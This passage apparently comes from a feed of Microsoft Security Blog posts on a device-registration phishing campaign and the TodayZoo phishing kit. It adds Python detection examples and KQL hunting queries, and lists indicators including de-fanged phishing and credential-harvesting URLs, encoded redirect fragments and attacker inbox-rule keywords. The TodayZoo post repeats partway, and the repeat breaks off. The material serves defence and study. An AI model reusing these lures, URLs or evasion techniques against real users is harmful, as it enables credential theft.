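                "title": DEVICE_ALERT if device else RULE_ALERT,
                "evidence": [e for e in (click, rule, device) if e],
            })
    return incidents


# Constructed audit records: four users, only one of whom ends up with a rogue device.
SPAM_RULE = {"SubjectOrBodyContainsWords": "junk;spam;phishing;hacked;password;with you",
             "actions": ["DeleteMessage", "MarkAsRead"]}
LEGIT_RULE = {"SubjectOrBodyContainsWords": "newsletter;digest", "actions": ["MoveToFolder"]}


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


SAMPLE_EVENTS = [
    {"time": _t("2021-11-02T09:00:00"), "user": "alice", "kind": "url_click", "domain": "abcde.arfghi.xyz"},
    {"time": _t("2021-11-02T09:02:00"), "user": "alice", "kind": "inbox_rule", "rule": SPAM_RULE},
    {"time": _t("2021-11-03T14:00:00"), "user": "alice", "kind": "device_registered", "device": "WIN10-UNMANAGED"},
    {"time": _t("2021-11-02T09:05:00"), "user": "bob", "kind": "url_click", "domain": "qwert.arzxcvb.xyz"},
    {"time": _t("2021-11-02T10:00:00"), "user": "carol", "kind": "url_click", "domain": "docs.example.com"},
    {"time": _t("2021-11-02T10:01:00"), "user": "carol", "kind": "inbox_rule", "rule": LEGIT_RULE},
    {"time": _t("2021-11-02T11:00:00"), "user": "dave", "kind": "url_click", "domain": "zyxwv.arabcd.xyz"},
    {"time": _t("2021-11-02T11:03:00"), "user": "dave", "kind": "inbox_rule", "rule": SPAM_RULE},
]


def run_demo() -> list:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for inc in run_demo():
        print(inc["user"], "->", inc["title"], f"({len(inc['evidence'])} events)")
```

In the constructed data, bob clicks but nothing follows (the MFA-protected case the post describes), carol’s rule is an ordinary mail-sorting rule, dave is compromised but no device appears, and only alice produces the device-registration incident. The ordering matters: a device registration that precedes the phishing click is not chained, which keeps a user’s routine enrollment of a new laptop from being pulled into an incident.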

The creation of the inbox rule on the targeted account coupled with the attackers’ newly registered device meant that they were now prepared to launch the second wave of the campaign. This second wave appeared to be aimed at compromising additional accounts by sending lateral, internal, and outbound phishing messages.

By using a device now recognized as part of the domain coupled with a mail client configured exactly like any regular user, the attacker gained the ability to send intra-organizational emails that were missing many of the typical suspect identifiers. By removing enough of these suspicious message elements, the attacker thereby significantly expanded the success of the phishing campaign.

To launch the second wave, the attackers leveraged the targeted user’s compromised mailbox to send malicious messages to over 8,500 users, both in and outside of the victim organization. The emails used a SharePoint sharing invitation lure as the message body in an attempt to convince recipients that the “Payment.pdf” file being shared was legitimate.

Screenshot of a sample email used in the second stage of the phishing campaign
Figure 6. Second-stage phishing email spoofing SharePoint

Like the first stage of the campaign, we found that the URL used in the second-wave phishing emails matched the first wave’s structure and also redirected to the newdoc-lnpye[.]ondigitalocean[.]app phishing website imitating the Office 365 login page. Victims that entered their credentials on the second-stage phishing site were similarly connected with Exchange Online PowerShell, and almost immediately had a rule created to delete emails in their respective inboxes. The rule had identical characteristics to the one created during the campaign’s first stage of attack.

Generally, the vast majority of organizations enabled MFA and were protected from the attackers’ abilities to propagate the attack and expand their network foothold. Nonetheless, those that do not have MFA enabled could open themselves up to being victimized in potential future attack waves.

Remediating device persistence: when resetting your password is not enough

Analysis of this novel attack chain and the additional techniques used in this campaign indicates that the traditional phishing remediation playbook will not be sufficient here. Simply resetting compromised accounts’ passwords may ensure that the user is no longer compromised, but it will not be enough to eliminate additional persistence mechanisms already in place.

Careful defenders operating in hybrid networks need to also consider the following steps:

If these additional remediation steps are not taken, the attacker could still have valuable network access even after successfully resetting the password of the compromised account. An in-depth understanding of this attack is necessary to properly mitigate and defend against this new type of threat.

Defending against multi-staged phishing campaigns

The latest Microsoft Digital Defense Report detailed that phishing poses a major threat to both enterprises and individuals, while credential phishing was leveraged in many of the most damaging attacks in the last year. Attackers targeting employee credentials, particularly employees with high privileges, typically use the stolen data to sign into other devices and move laterally inside the network. The phishing campaign we discussed in this blog exemplifies the increasing sophistication of these attacks.

In order to disrupt attackers before they reach their target, good credential hygiene, network segmentation, and similar best practices increase the “cost” to attackers trying to propagate through the network. These best practices can limit an attacker’s ability to move laterally and compromise assets after initial intrusion and should be complemented with advanced security solutions that provide visibility across domains and coordinate threat data across protection components.

Organizations can further reduce their attack surface by disabling the use of basic authentication, enabling multi-factor authentication for all users, and requiring multi-factor authentication when joining devices to Azure AD. Microsoft 365 global admins can also disable Exchange Online PowerShell for individual or multiple end users via a list of specific users or filterable attributes, assuming that the target accounts all share a unique filterable attribute such as Title or Department. For additional security, customers can enforce our new Conditional Access (CA) control requiring MFA to register devices, which can be combined with other CA conditions like device platform or trusted networks.

Microsoft 365 Defender correlates the alerts and signals related to the initial phishing, the suspicious inbox rule creation, and the suspicious device registration into a single, easy-to-comprehend incident.

Screenshot of Microsoft 365 Defender incident view showing suspicious device registration and inbox rule
Figure 7. Microsoft 365 Defender incident with suspicious device registration and inbox rule

Microsoft Defender for Office 365 protects against email threats using its multi-layered email filtering stack, which includes edge protection, sender intelligence, content filtering, and post-delivery protection, in addition to including outbound spam filter policies to configure and control automatic email forwarding to external recipients. Moreover, Microsoft Defender for Office 365 uses the Safe Links feature to proactively protect users from malicious URLs in internal messages or in an Office document at time of click.

Advanced hunting queries

Hunting for emails with phishing URL

let startTime = ago(7d);
let endTime = now();
EmailUrlInfo
| where Timestamp between (startTime..endTime)
| where UrlDomain matches regex @"^[a-z]{5}\.ar[a-z]{4,5}\.xyz"
| project NetworkMessageId,Url
| join (EmailEvents 
| where Timestamp between (startTime..endTime))
on NetworkMessageId

Hunting for suspicious Inbox Rules

// Hunting for suspicious Inbox Rules
let startTime = ago(7d);
let endTime = now();
CloudAppEvents
| where Timestamp between(startTime .. endTime)
| where ActionType == "New-InboxRule"
| where RawEventData contains "Spam Filter"
| where RawEventData has_any("junk","spam","phishing","hacked","password","with you") 
| where RawEventData contains "DeleteMessage" 
| project Timestamp, AccountDisplayName, AccountObjectId, IPAddress

Hunting for rogue device registrations

// Hunting for rogue device registrations
let startTime = ago(7d);
let endTime = now();
CloudAppEvents
| where Timestamp between(startTime .. endTime)
| where ActionType == "Add registered owner to device." 
| where RawEventData contains "notorius"
| where AccountDisplayName == "Device Registration Service"
| where isnotempty(RawEventData.ObjectId) and isnotempty(RawEventData.ModifiedProperties[0].NewValue) and isnotempty(RawEventData.Target[1].ID) and isnotempty(RawEventData.ModifiedProperties[1].NewValue)
| extend AccountUpn = tostring(RawEventData.ObjectId)
| extend AccountObjectId = tostring(RawEventData.Target[1].ID)
| extend DeviceObjectId = tostring(RawEventData.ModifiedProperties[0].NewValue)
| extend DeviceDisplayName = tostring(RawEventData.ModifiedProperties[1].NewValue)
| project Timestamp,ReportId,AccountUpn,AccountObjectId,DeviceObjectId,DeviceDisplayName

The post Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA appeared first on Microsoft Security Blog.

Franken-phish: TodayZoo built from other phishing kits

October 21st, 2021

A phishing kit built using pieces of code copied from other kits, some available for sale through publicly accessible scam sellers or are reused and repackaged by other kit resellers, provides rich insight into the state of the economy that drives phishing and email threats today. We uncovered this phishing kit while examining an extensive series of credential phishing campaigns that all sent credentials to a set of endpoints operated by the attackers.

We named the kit “TodayZoo” because of its curious use of these words in its credential harvesting component in earlier campaigns, likely a reference to phishing pages that spoofed a popular video conferencing application. Our prior research on phishing kits told us TodayZoo contained large pieces of code copied from widely circulated ones. The copied code segments even have the comment markers, dead links, and other holdovers from the previous kits.

Today’s phishing attacks operate on a landscape fueled by an evolved service-based economy filled with efficient, reliable, and profitable offerings. Attackers who wish to launch a phishing campaign may rent their resource and infrastructure needs from phishing-as-a-service (PhaaS) providers, who do the legwork for them. Alternatively, they can make a one-time purchase of a phishing kit that they can “plug and play.”

That’s not to say that attackers who build their kits from the ground up are at a disadvantage. If anything, the abundance of phishing kits and other tools available for sale or rent makes it easy for a lone wolf attacker to pick and choose the best features from these kits. They put these functionalities together in a customized kit and try to reap the benefits all to themselves. Such is the case of TodayZoo: because of the consistency in the redirection patterns, domains, and other techniques, tactics, and procedures (TTPs) of its related campaigns, we believe that the actors behind it came across an old phishing kit template and replaced the credential harvesting part with its own exfiltration logic to make TodayZoo solely for their nefarious purposes.

Since the first observed instances of the TodayZoo phishing kit last December, large email campaigns leading to it have continued without significant pause. Our analysis of its phishing page artifacts, redirection routines, and domain generation algorithm (DGA) methods for the initial sites helps ensure Microsoft Defender for Office 365 effectively protects customers from the said campaigns.

Microsoft tracks unique phishing kits, phishing services, and other components used in phishing to better protect customers from malicious emails at a larger scale. Combined with our monitoring of individual credential campaigns and the latest evasion techniques, our research into kits and services provides us with a better understanding of the structure of phishing email messages. Such threat intelligence and insights, in turn, feed into our protection technologies, such as Defender for Office 365 and Microsoft 365 Defender.

This blog post details some of the technical aspects of a phishing campaign based on the TodayZoo kit. It also provides information about “DanceVida,” a potential parent family of kits based on a shared resource link, and how it and other historical patterns figure in TodayZoo’s code structure.

What’s in a kit?

A “phishing kit” or “phish kit” can refer to various parts of a set of software or services meant to facilitate phishing. The term refers most commonly to an archive file containing images, scripts, and HTML pages that enable an attacker to quickly set up an undetectable phishing page and collect credentials through it. However, “phishing kit” can also be used to refer specifically to the unique page itself that spoofs a brand and interacts with a user, collects the user’s credentials, and posts them to an asset the attacker owns.

Phishing kits are generally split into the following major components based on function:

  • Imitation: These components help make the login pages appear legitimate. These can include imagery to imitate welcome banners, as well as dynamically generated logos and branding that are fetched based on the target’s email address. These components may also include legitimate links and “help” or “password reset” buttons that navigate cautious users out of the page and onto legitimate sites.
  • Obfuscation: These components hide the pages’ true purpose from scanners or automated security detection systems. Obfuscation techniques can be through encoding or individual functions designed to make the extraction of resources more difficult. Obfuscation can also include anti-sandboxing resources on the page or on the site that are called to enforce geofencing, CAPTCHAs, and others.
  • Credential harvest: These components facilitate the entry, collection, and exfiltration of the credentials the target user provides. These components also include information about where said credentials are sent, how they are stored, and which sites the user is sent to after giving their credentials.

These components are seen in the TodayZoo phishing kit, which we will discuss in the following sections.

Breaking down a TodayZoo-based phishing campaign

The use of the TodayZoo phishing kit was initially seen in December 2020. Then, in March 2021, we observed a series of phishing campaigns abusing the AwsApps[.]com domain to send the email messages that eventually directed users to the final landing pages, leading us to examine the kit more closely. As of this writing, we have already notified Amazon about the abovementioned abuse of their domain, and they promptly took action.

The attackers created malicious accounts at scale. Initially, the sender emails appeared with randomly generated domain names such as wederfs76y3uwedi3uy89ewdu23ye87293eqwhduayqw[.]awsapps[.]com. This contrasts with legitimate emails—and even some spoofed phishing ones—where the subdomain would represent a company hostname.

The email message itself was relatively simple: it impersonated Microsoft and leveraged a zero-point font obfuscation technique in an attempt to evade detection. For example, in the early iterations of their campaign, the attackers used the <ins></ins> tags to insert the date of the message every few characters invisibly, as shown below:

Screenshot of HTML code showing zero-point font technique

Figure 1. Example of zero-point font obfuscation to insert the date into the HTML code of the email message
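As an added example (not code from the original post or from Microsoft), the following Python recovers the text a recipient actually sees from an email body padded this way and flags the padding signature. It assumes the hidden <ins> elements carry an inline font-size:0 style, since the exact markup in the screenshot is not reproduced here; the sample body is constructed.

```python
"""Strip zero-point font padding from an HTML email body (added example)."""
import re
from html.parser import HTMLParser

# Constructed sample body: a visible lure with the message date injected every
# few characters inside <ins> elements that render at zero font size.
SAMPLE_HTML = (
    '<p>Your pas<ins style="font-size:0px">10/21/2021</ins>sword wi'
    '<ins style="font-size:0">10/21/2021</ins>ll exp<ins style="font-size: 0">'
    '10/21/2021</ins>ire today.</p>'
)

# Inline style declaration that makes text invisible by size (assumed markup).
ZERO_FONT_RE = re.compile(
    r"font-size\s*:\s*0(?:\.0+)?(?:px|pt|em|%)?\s*(?:;|$)", re.IGNORECASE
)


class ZeroFontStripper(HTMLParser):
    """Separate rendered text from text hidden inside zero-font elements."""

    def __init__(self):
        super().__init__()
        self.visible = []        # text runs a recipient would see
        self.hidden = []         # text runs hidden by a zero font size
        self._hidden_depth = 0   # >0 while inside a zero-font element
        self._stack = []         # (tag, is_hidden) for every open element

    def handle_starttag(self, tag, attrs):
        style = dict(attrs).get("style") or ""
        hidden = bool(ZERO_FONT_RE.search(style))
        self._stack.append((tag, hidden))
        if hidden:
            self._hidden_depth += 1

    def handle_endtag(self, tag):
        # Pop back to the matching open tag, tolerating unclosed void tags like <br>.
        while self._stack:
            open_tag, hidden = self._stack.pop()
            if hidden:
                self._hidden_depth -= 1
            if open_tag == tag:
                break

    def handle_data(self, data):
        (self.hidden if self._hidden_depth else self.visible).append(data)


def analyze(html, min_runs=3):
    """Return the visible text plus a verdict on zero-font padding.

    The padding signature used here (an assumption of this example): at least
    `min_runs` hidden runs that all carry the same value, interleaved with
    visible text, as the date insertion described in the post would produce.
    """
    parser = ZeroFontStripper()
    parser.feed(html)
    parser.close()
    hidden_values = sorted({run.strip() for run in parser.hidden})
    return {
        "visible_text": "".join(parser.visible),
        "hidden_runs": len(parser.hidden),
        "hidden_values": hidden_values,
        "suspected_zero_font_padding": (
            len(parser.hidden) >= min_runs and len(hidden_values) == 1
        ),
    }


if __name__ == "__main__":
    print(analyze(SAMPLE_HTML))
```

Feed the returned visible text, rather than the raw HTML, to any keyword or lure classifier so that the injected characters do not break the match.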

The social engineering lures in the message body changed repeatedly over the months. Campaigns in April and May used password reset lures, while the more recent campaigns in August leveraged fax and scanner notifications.

Screenshot of email used in this campaign

Figure 2. Example of an email lure leading to TodayZoo phishing kit

Regardless of the lure, the following attack chain is consistent, with initial and secondary redirectors, a final landing page, and a credential harvesting page. Below is a sample of TodayZoo’s attack chain URLs:

  • Initial redirector: hxxp://2124658742[.]ujsd[.]pentsweser[.]com//fhwpp8sv[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • Secondary redirector: hxxps://limestonesm[.]com/edfh.kerfq/#no-reply@microsoft[.]com
  • Final landing page: hxxps://fra1[.]digitaloceanspaces[.]com/koip/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26.html#no-reply@microsoft[.]com
  • Credential harvesting page: hxxps://nftduniya[.]com/cas/vcoominctodayq[.]php

The initial and secondary URLs are either compromised or attacker-created sites and serve as redirectors that funnel the much larger set of URLs used in the emails to the final landing page where the phishing kit is hosted. The initial URL used infinite subdomains, a previously discussed technique that lets attackers use a unique URL for each recipient while only purchasing or compromising one domain. The initial URL was also malformed, with multiple forward slashes at the start of the path, and it carried the secondary URL encoded together with the recipient’s email address.
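Added example, not the post’s or Microsoft’s own tooling: a Python triage helper that recognizes the initial-redirector URL shape described above (including the variants without the numeric subdomain listed among the sample initial URLs later in the post), decodes the fragment to recover the secondary redirector and the targeted recipient, and de-fangs the result for reporting. The regex is this example’s own approximation of that shape, and the sample URL is the post’s first de-fanged initial URL with the fangs restored.

```python
"""Triage helper for the TodayZoo redirector chain (added example)."""
import base64
import binascii
import re
from typing import Dict, Optional, Tuple

# Constructed sample: the post's first de-fanged initial URL, re-fanged for parsing.
SAMPLE_URL = (
    "http://2124658742.ujsd.pentsweser.com//fhwpp8sv.#"
    "aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ=="
)

# Approximation of the initial-redirector shape: optional scheme, optional
# per-recipient numeric subdomain, the "ujsd" label, one base domain, a double
# slash at the path boundary, a random token, ".#", and a base64 fragment.
INITIAL_URL_RE = re.compile(
    r"^(?:https?://)?"
    r"(?:(?P<sub>[0-9]+)\.)?"
    r"(?:ujsd\.)?"
    r"(?P<base>[a-z0-9-]+\.[a-z]{2,})"
    r"//"
    r"(?P<token>[a-z0-9]+)\.#"
    r"(?P<frag>[A-Za-z0-9+/=]+)$",
    re.IGNORECASE,
)


def defang(value: str) -> str:
    """Render a URL or domain in the post's own hxxp / [.] reporting style."""
    return value.replace("http", "hxxp").replace(".", "[.]")


def decode_fragment(frag: str) -> Optional[Tuple[str, str]]:
    """Return (secondary_redirector, recipient) from the base64 fragment, or None."""
    try:
        raw = base64.b64decode(frag, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    # Decoded layout seen in the post: "<secondary URL>#<recipient email>"
    secondary, sep, recipient = raw.partition("#")
    if not sep or "@" not in recipient:
        return None
    return secondary, recipient


def triage(url: str) -> Optional[Dict[str, Optional[str]]]:
    """Return chain details when the URL fits the TodayZoo shape, else None."""
    m = INITIAL_URL_RE.match(url.strip())
    if not m:
        return None
    decoded = decode_fragment(m.group("frag"))
    secondary = decoded[0] if decoded else None
    return {
        "base_domain": m.group("base").lower(),
        "subdomain": m.group("sub"),  # None for samples without the numeric label
        "secondary_url": secondary,
        "recipient": decoded[1] if decoded else None,
        "report_line": "{} -> {}".format(
            defang(m.group("base").lower()),
            defang(secondary) if secondary else "<undecodable fragment>",
        ),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_URL))
    print(triage("https://login.microsoftonline.com/"))  # -> None
```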

In almost every instance of the TodayZoo-based campaign we’ve seen, the final landing page is hosted within the service provider DigitalOcean. This page bears a few tangible differences from a standard Microsoft 365 sign-in page. Notably, it has not substantially changed in appearance from the start of the year to the time of publication of this blog. This lack of change is because, despite the numerous changes in the delivery method, lures, and sites used as indicators of attack (IOAs), the TodayZoo kit stayed nearly identical with only a few strings changing.

Screenshot of phishing page where credentials are stolen

Figure 3. An example of TodayZoo’s fake sign-in page in August 2021

There was little of the obfuscation component within the TodayZoo kit because the landing page’s source code revealed where the stolen credentials would be exfiltrated, which was another compromised site ending in TodayZoo.php. Typically, credential harvesting pages process the credentials and forward them to additional email accounts owned by sellers or purchasers of the kit for collection later. It’s unusual for campaigns to store the credentials locally on the site itself.

Screenshot of code for credential harvesting

Figure 4. An excerpt from the TodayZoo HTML source depicting credential exfiltration

It should be noted that based on our analysis, the file name TodayZoo.php appears to be derived from a previous version of the phishing kit whose credential processing page ends in Zoom.php. The said version also has markers like “Today Zoom Meetings,” indicating that it was initially targeting users of a popular video conferencing application.

The succeeding TodayZoo-based campaigns follow the attack kill chain pattern and source code discussed above. While TodayZoo.php was used for the first few months of operation, the most recent harvesting pages have kept the word “today” but may now use vcoominctodayq.php instead.

The attackers have also moved from abusing a single legitimate mailing service to compromising mailing service accounts for their email campaigns. However, they maintain specific leftover character patterns in their URL paths and subdomains that work with the other TTPs described.

Piecing the puzzle

Typically, phishing kits that are resold or reused have indicators of multiple actors using them through their generated email campaigns. For example, these campaigns will have varying redirection techniques and hosting domains for their final landing pages. In the case of TodayZoo, as previously mentioned, there is consistency in the patterns, domains, and TTPs of the related campaigns. While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits. These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own.

Within the source code of the TodayZoo landing page we analyzed, there were several static references at the very start to external sources. Generally, these external links help a phishing kit properly imitate the login page and other branding elements of the site they are spoofing. However, in TodayZoo’s case, many of these site connections were “dead links” and did not serve a relevant function within the page. Littered throughout the source code as well were various markers like <!-- FORM 1111111111111111 --> and <!-- FINISHHHHHHHHHHHHHHHHHHHHH -->. Some portions of the source code also utilized multiple languages in different sections, making clear indications of which ones have been replaced.

Upon further investigation, we identified the dead links and markers as holdovers from many other commoditized kits available for free or purchase. We then compared TodayZoo with other phishing kits we have analyzed previously and found that even these kits also contained references to sites like Dancevida[.]com but would have different code blocks for their obfuscation or credential harvest components.

Screenshot of TodayZoo code showing references to DanceVida

Figure 5. An excerpt from a TodayZoo landing page source code referencing DanceVida[.]com

The DanceVida connection

“DanceVida” is more of a code block than a full-fledged phishing kit. As such, kits that use DanceVida are rather diverse in their delivery, lures, and location because they are directly for sale on various forums under kit-naming schemas, as well as under a wider variety of landing page templates, including document download pages. Most of the credentials that the DanceVida-based kits’ harvesting pages gather are exfiltrated to accounts using free email services, such as GMail, Yahoo!, and Yandex.

One of the more notable kits that also references DanceVida and shares components with what we observed in the TodayZoo credential phishing campaigns is “Office-RD117,” which is related to an online seller known as “Fud Tool.” This seller also offers other phishing kits and email and SMS delivery tools on various forums and other websites.

Screenshot of FUD Tool website

Figure 6: Screenshot of the now-defunct Fud Tool website from the Wayback Machine Internet Archive

It is interesting to note that when analyzing the Office-RD117 kit, we also saw signatures from multiple sellers within its packaged resources. There are also instances of dead links, such as a reference to a GitHub account that was only live for less than a day in January 2020 (the said account is still carried over to kits online as of this writing). This goes to show that even commercially available phishing kits reuse and repurpose elements from other ones. Such mixing and matching also make it quite challenging to determine where one kit ends and another one begins.

Comparing TodayZoo with DanceVida and other kits

In the case of TodayZoo, we observed that its implementations only match the larger superset of kits referencing DanceVida at about 30-35%. As seen in the figures below, which compare a TodayZoo sample with a randomly selected DanceVida sample, both initially have similar structure and pieces of code until TodayZoo deviates in the credential harvesting component:

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 7. A comparison of DanceVida and TodayZoo kits, showing matching source codes

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 8. A comparison of DanceVida and TodayZoo kits showing highly similar source codes. Note how TodayZoo has changed its variables.

Screenshots comparing source code for DanceVida and TodayZoo phishing kits

Figure 9. A comparison of DanceVida and TodayZoo kits showing slightly different implementation for credential posting

To further illustrate the “Frankenstein’s monster” characteristic of TodayZoo, the table below expands the comparison of one of its current phishing pages with Office-RD117, as well as with four other landing pages. These landing pages are unattributed to specific operators and reference DanceVida or use the same credential-harvesting POST statements. While all these samples share code segments in their imitation, obfuscation, or credential harvesting components, they each still have unique elements that differentiate them.

Table comparing different phishing kits and their similarity with TodayZoo

Table 1. Similarity areas and percentages of related phish kits to a recent TodayZoo sample

Visual representation of similarity of code between TodayZoo and other phishing kits

Figure 10. Graphical representation of the similarity areas of related phish kits to a recent TodayZoo sample

The above comparisons show a history of alterations and suggest the existence of a “core” set of code being reused by these phishing kits. They are also reminiscent of how remote access Trojans (RATs) and other malware families are continuously retooled by threat actors yet retain large chunks of code across the board.

How threat intelligence enriches anti-phishing technologies in Microsoft Defender for Office 365

Our analysis of TodayZoo, DanceVida, and other phishing kits gives us several insights into the underground economy today. First, this research further proves that most phishing kits observed or available today are based on a smaller cluster of larger kit “families.” While this trend has been observed previously, it continues to be the norm, given how phishing kits we’ve seen share large amounts of code among themselves. The continued presence of dead links and callbacks to other kits indicates that many phishing kit distributors and phishing operators have easy access to these existing kits and use parts of them to make new ones faster.

Secondly, our research shows that the players in the cybercrime economy count on a lack of examination into their products. Whether that is a bane or a boon on their part depends on how the products’ codes are implemented. For example, an unchecked reused kit that still calls back to its original creator with copies of stolen credentials potentially translates into an equivalent of a passive income for the said creator.

Insights such as those presented above enrich our protection technologies. Our intelligence on unique phishing kits such as TodayZoo, phishing services, and other components of phishing attacks allows Microsoft Defender for Office 365 to detect related campaigns and block malicious emails, URLs, and landing pages. Combined with Defender for Office 365’s use of machine learning, heuristics, and advanced detonation technology, such intel also makes it possible to detect kits that attempt to leverage techniques from one or multiple codes, even before a user receives the email or interacts with the content.

Threat intelligence about the latest trends in the phishing landscape also feeds into other Microsoft security solutions, such as Microsoft Defender SmartScreen, which blocks phishing websites and malicious URLs and domains in the browser, and Network protection, which blocks connections to malicious domains and IP addresses. Advanced hunting capabilities allow analysts to search for phishing kit components and other IOAs.

Organizations can configure the recommended settings in Microsoft Defender for Office 365, such as applying anti-phishing, Safe Links, and Safe Attachments policies. These ensure real-time protection by scanning at the time of delivery and at the time of click. They can further strengthen their protection with Microsoft 365 Defender, which correlates signals from emails, endpoints, and other domains, delivering coordinated defense.

Learn how you can stop credential phishing and other email threats through comprehensive, industry-leading protection with Microsoft Defender for Office 365.

Visit our National Cybersecurity Awareness Month page for more resources and information on protecting your organization year-round. Do your part. #BeCyberSmart

Microsoft 365 Defender Threat Intelligence Team

Advanced hunting queries

Emails with TodayZoo operator patterns

Use this query to find emails sent that utilize additional forward slashes at the path and domain split point and utilize the TodayZoo operators’ patterns in the path and the subdomain structure. TodayZoo operators occasionally store URLs in the attachment, so this query would not surface those instances.

EmailUrlInfo
| where Url matches regex "(ujsd)?\\.[a-z]+\\.com\\/\\/.+\\.#"

Endpoint activity where TodayZoo patterns redirect to DigitalOcean

Use this query to find endpoint network connections to URLs that utilize additional forward slashes at the path and domain split point and the TodayZoo operators’ path and subdomain patterns, or that reach DigitalOcean Spaces, grouped per device and hour so that devices contacting two or more such domains in the same hour surface.

DeviceNetworkEvents
| where RemoteUrl matches regex "(ujsd)\\.[a-z]+\\.com\\/\\/.+\\.#" or RemoteUrl endswith "digitaloceanspaces.com"
| extend Domain = extract(@"[^.]+(\.[^.]{2,3})?\.[^.]{2,12}$", 0, RemoteUrl)
| summarize dcount(Domain), make_set(Domain) by DeviceId,bin(Timestamp, 1h), InitiatingProcessFileName, InitiatingProcessCommandLine
| where dcount_Domain >= 2

Indicators of compromise

Sample initial base domains


Sample initial domains with subdomains


Sample initial URLs

  • odghyuter[.]com//wfvmlpxuhjeq[.]#aHR0cHM6Ly9wb2dmaHJ5ZXQuY29tL2VkZmgua2VyZnEvI25vLXJlcGx5QG1pY3Jvc29mdC5jb20=
  • ujsd.coffimkeer[.]com//0jw7yklk[.]#aHR0cHM6Ly9sdWh5cnR5ZS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.pentsweser[.]com//iojjyaqw[.]#aHR0cHM6Ly9saW1lc3RvbmVzbS5jb20vZWRmaC5rZXJmcS8jbm8tcmVwbHlAbWljcm9zb2Z0LmNvbQ==
  • ujsd.brepeme[.]com//bnxvhyex[.]#aHR0cHM6Ly92YWVwbGVyLmNvbS9lZGZoLmtlcmZxLyNuby1yZXBseUBtaWNyb3NvZnQuY29t

Sample secondary (redirector) URLs

  • pogfhryet[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com
  • luhyrtye[.]com/edfh[.]kerfq/#no-reply@microsoft[.]com

Sample final landing page

  • nyc3[.]digitaloceanspaces[.]com/bnj/25_40_24_5E_40_26_40_26_28_29_23_23_5E_23_24_26_5E_25_26_40_5E_28_23_26_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25_%25[.]html#no-reply@microsoft[.]com

Sample credential harvesting page

  • lcspecops[.]com/psl/vcoominctodayq[.]php


The post Franken-phish: TodayZoo built from other phishing kits appeared first on Microsoft Security Blog.

Franken-phish: TodayZoo built from other phishing kits

October 21st, 2021 No comments

A phishing kit built using pieces of code copied from other kits, some available for sale through publicly accessible scam sellers or are reused and repackaged by other kit resellers, provides rich insight into the state of the economy that drives phishing and email threats today. We uncovered this phishing kit while examining an extensive series of credential phishing campaigns that all sent credentials to a set of endpoints operated by the attackers.

We named the kit “TodayZoo” because of its curious use of these words in its credential harvesting component in earlier campaigns, likely a reference to phishing pages that spoofed a popular video conferencing application. Our prior research on phishing kits told us TodayZoo contained large pieces of code copied from widely circulated ones. The copied code segments even have the comment markers, dead links, and other holdovers from the previous kits.

Today’s phishing attacks operate on a landscape fueled by an evolved service-based economy filled with efficient, reliable, and profitable offerings. Attackers who wish to launch a phishing campaign may rent their resource and infrastructure needs from phishing-as-a-service (PhaaS) providers, who do the legwork for them. Alternatively, they can make a one-time purchase of a phishing kit that they can “plug and play.”

That’s not to say that attackers who build their kits from the ground up are at a disadvantage. If anything, the abundance of phishing kits and other tools available for sale or rent makes it easy for a lone wolf attacker to pick and choose the best features from these kits. They put these functionalities together in a customized kit and try to reap the benefits all to themselves. Such is the case of TodayZoo: because of the consistency in the redirection patterns, domains, and other techniques, tactics, and procedures (TTPs) of its related campaigns, we believe that the actors behind it came across an old phishing kit template and replaced the credential harvesting part with its own exfiltration logic to make TodayZoo solely for their nefarious purposes.

Since the first observed instances of the TodayZoo phishing kit last December, large email campaigns leading to it have continued without significant pause. Our analysis of its phishing page artifacts, redirection routines, and domain generation algorithm (DGA) methods for the initial sites helps ensure Microsoft Defender for Office 365 effectively protect customers from the said campaigns.

Microsoft tracks unique phishing kits, phishing services, and other components used in phishing to better protect customers from malicious emails at a larger scale. Combined with our monitoring of individual credential campaigns and the latest evasion techniques, our research into kits and services provides us with a better understanding of the structure of phishing email messages. Such threat intelligence and insights, in turn, feed into our protection technologies, such as Defender for Office 365 and Microsoft 365 Defender.

This blog post details some of the technical aspects of a phishing campaign based on the TodayZoo kit. It also provides information about “DanceVida,” a potential parent family of kits based on a shared resource link, and how it and other historical patterns figure in TodayZoo’s code structure.

What’s in a kit?

A “phishing kit” or “phish kit” can refer to various parts of a set of software or services meant to facilitate phishing. The term refers most commonly to an archive file containing images, scripts, and HTML pages that enable an attacker to quickly set up an undetectable phishing page and collect credentials through it. However, “phishing kit” can also be used to refer specifically to the unique page itself that spoofs a brand and interacts with a user, collects the user’s credentials, and posts them to an asset the attacker owns.

Phishing kits are generally split into the following major components based on function:

  • Imitation: These components help make the login pages appear legitimate. These can include imagery to imitate welcome banners, as well as dynamically generated logos and branding that are fetched based on the target’s email address. These components may also include legitimate links and “help” or “password reset” buttons that navigate cautious users out of the page and onto legitimate sites.
  • Obfuscation: These components hide the pages’ true purpose from scanners or automated security detection systems. Obfuscation techniques can be through encoding or individual functions designed to make the extraction of resources more difficult. Obfuscation can also include anti-sandboxing resources on the page or on the site that are called to enforce geofencing, CAPTCHAs, and others.
  • Credential harvest: These components facilitate the entry, collection, and exfiltration of the credentials the target user provides. These components also include information about where said credentials are sent, how they are stored, and which sites the user is sent to after giving their credentials.

These components are seen in the TodayZoo phishing kit, which we will discuss in the following sections.

